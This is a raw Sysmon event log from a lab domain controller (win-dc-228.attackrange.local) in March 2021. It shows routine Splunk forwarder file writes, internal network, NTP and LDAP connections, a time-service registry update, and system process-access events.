13:57:36.056{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82EDC15C62A91DD863A43884C6EBEA9E,SHA256=948A23F3775E33016CA56C6BE6238877A870121ABA918F488EC1BAB5F2B0D3BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201247Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:37.431{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83FCCA656A2D22B43F9AE7EC0E539406,SHA256=0CCB12997BDAE814FDC5F51EB6E1822FBECD3EEBB35908DF004426FF12E3765C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201246Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:32.877{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55196-false10.0.1.12-8000- 23542300x80000000000000002201248Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:38.447{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AAADACE50583B053DAFC4F3549009AC,SHA256=EB8576D205D8153EFEDD12B6DF99127A818AE42D8AAAA4F0AE718BA3EDEEEFBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201249Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:39.478{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=565555D2BFFE6F03E3CD11034573393F,SHA256=54838FB16273D96F283D6AD58575C25F183C90AA440722EE31306476A6A8A982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201250Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:40.494{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983B45854995C83C848BB11468B1F8F8,SHA256=6D7444210B751EC50C7B11FD3CBE5D25141C789784065EFA8A6BD9329BA7FAFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201251Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:41.510{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8191A13033BF69D6BBE03817F3937821,SHA256=2A5E034B55F766EBA6093BA179868A35A98350E6DF9DB3CAEB630173DE6A5B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201254Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:42.541{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE0E30F404E17952D153BC2AAE8A2579,SHA256=4657F5C2220F73EDD5A80B78DF6D4D8A6D901D5C5BE977B0058D042BA00FDD9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201253Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:42.072{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0E3F4821BDAD6B90DBDEDDE4D94D90D,SHA256=188E9C86B445B32C45F19AFD6147D46AEDEFB7F735BFDF4963C99965C6D6DDFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201252Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:42.072{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94690105623F9A444F7659C94846AD99,SHA256=0F569F1B5AE0A9933A71F4F767AFD3E3E6DAA98A1B1FEBFB34CCD4E5259D1F9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201256Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:38.908{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55197-false10.0.1.12-8000- 23542300x80000000000000002201255Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:43.556{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5CB5062183C849A4CAD3DD42524F8C,SHA256=D29167BE9CBD1C33ABD8536FCADA1726F69E603F1CAC390E8A67C8AB7B3DA1E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201258Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:44.572{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A73304893ABAA05644F2B664F22EAD,SHA256=C0BBF24437B73D7DF00FDDF461712AC047F65479CBA82091CA07F6FB9D9FAD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201257Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:44.041{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0E3F4821BDAD6B90DBDEDDE4D94D90D,SHA256=188E9C86B445B32C45F19AFD6147D46AEDEFB7F735BFDF4963C99965C6D6DDFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201259Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:45.603{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69BF03CC07AA5365D67F70BC4FB42E02,SHA256=1B08E791E3A966F2AAE4D681A62F1DFEAE778BBCE64751220197FDA8FD7A6081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201260Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:46.619{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50E346028325BDD9CC133DD4333006CD,SHA256=EB2B928E31EF88E4F73A802AAD1CDC59F96ECD37C6172B0498D7D733142F60C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201262Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:47.635{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C50DADAFF99B5605A2199C3326BC5D,SHA256=6915E0554D5D0819066966A148673A5A867EC8EB1022D4B6A2BDEA8EDD196879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201261Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:47.291{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBBCAC696617454608DC73FE6F8BFE54,SHA256=897D18892D572E0DA1FF389C001E68995FA3CE362263ED3AC47ED406D1DE147B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201264Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:48.650{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35C215225FE9C1B535C38E72B0DF0A02,SHA256=E85DFA227409B7905C017837886B79B8D0D43CF61D62A0742119BD5206C2F9E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201263Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:43.955{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55198-false10.0.1.12-8000- 23542300x80000000000000002201265Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:49.681{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A89F4A71F9DE67628EB11696A38E2EF8,SHA256=0CD99DAC812D7530BEEE52985437C6FE0B4B8C905CC9D95FEB8E84EBB3A44870,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201266Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:50.713{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49147ECCE85EF2D515197F2B9B9E2F43,SHA256=32963D46F2BD69397448FF8852158BB4658F2480EBC04EDB0655DFFD3F9E99AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201268Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:51.728{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B85B0A9A219C76DE6E43E6F00D4B12AE,SHA256=38271227040F2E19137C07CBBE9C1DC5F6729D73949C6D4BB0CED16FF7255ED7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201267Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:51.088{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31BA28D14F5F65330523119164424414,SHA256=0BDDC2A830A2C20E88B03A206902849F3659AA0CA8F546ECD578AA85B8B722A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201270Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:52.744{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5175D43B1CDEEBAB17581B261579A085,SHA256=EE22A765541B34E879774CCC72F88A77AA84C7AE47B8411A07E76C0ADD3397CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201269Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:52.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97A16AE3D8B3EFADBC51DC4782EDA131,SHA256=CE2D15E935CD734DD96D51752CAD3E698549AE91A097B48A35945F95A15611EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201272Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:49.002{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55199-false10.0.1.12-8000- 23542300x80000000000000002201271Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:53.775{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5E99404B8C40F32B7196C2726B6F61,SHA256=D976699E1CE3879C0BC79E78B9938B430AA64E99E4CBA110B1FC188CD6ED0739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201274Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:54.775{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB7952B883E70B05734AD20563DF6E23,SHA256=9EEEA82F04C8301C1E5B36FBC10D8542857FD3FA3CC750B0C1B76B157660E09A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002201273Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:57:54.291{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d710fe-0x5fa214ae) 23542300x80000000000000002201276Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:55.806{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E42A11B8DE4D97E8CAD6589777C3DD6,SHA256=FD56CDCBD4951E47FD04B3A33F54BB3EEDD8BE95C1717D90ADB85C6DC0089F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201275Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:55.291{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89034533221A432B0EB9CE097ECBA861,SHA256=48A613102EF3F37D6E2791E531366D499F3AB16814111DD7611254E992C61D88,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201278Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:52.064{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-228.attackrange.local123ntpfalse13.86.101.172-123ntp 23542300x80000000000000002201277Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:56.838{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4094AB461442EEFDB7D5A264D6D14497,SHA256=B3AC0C2002692E6319280DA2ADCB497E65EA49FAF3CFA5E1D0F4A448BDC1D88A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201282Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:53.862{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55200-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201281Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:53.862{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55200-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002201280Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:57.838{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EE256EE894847031017610C775C5AD7,SHA256=49FA67B50DBED9BEB98684DC9A59C3787957B14577B851C08D669899060C13EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201279Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:57.260{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=967F3CDBA1402CB61515E7F3029FC23D,SHA256=F9BD748C472D83F36E4F0A9A5C546544C72A2A4B9DBA408F013003CAD5947CB5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201284Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:54.018{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55201-false10.0.1.12-8000- 23542300x80000000000000002201283Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:58.869{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB480136869A011C1A1A47ACCCB3A5B,SHA256=772654F190A601499D6A3875138D68D439FA370000CFD0EDB3854CB44A431305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201285Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:59.900{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EE01BFF4328439A70C62E1F9CD0FF60,SHA256=67B1419C1C9DD9195A1136E08C957762EAD80905361724162D81501F449C98C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201286Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:00.947{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAE652D25315D89695C495E7CF029166,SHA256=89AC9AA434F3A9A8FF22101B524D21977B75A103D2A3BFD6E2671DBFF6EAD633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201287Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:01.947{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CB26376651FF7E7A00D004821F4756,SHA256=78499774398B2EFF0C343248523A51F8FD1CB1661A99B9FE4886BF85E1967492,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201305Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E76A-6040-FC4D-00000000AD01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201304Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201303Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201302Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201301Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201300Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E76A-6040-FC4D-00000000AD01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201299Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 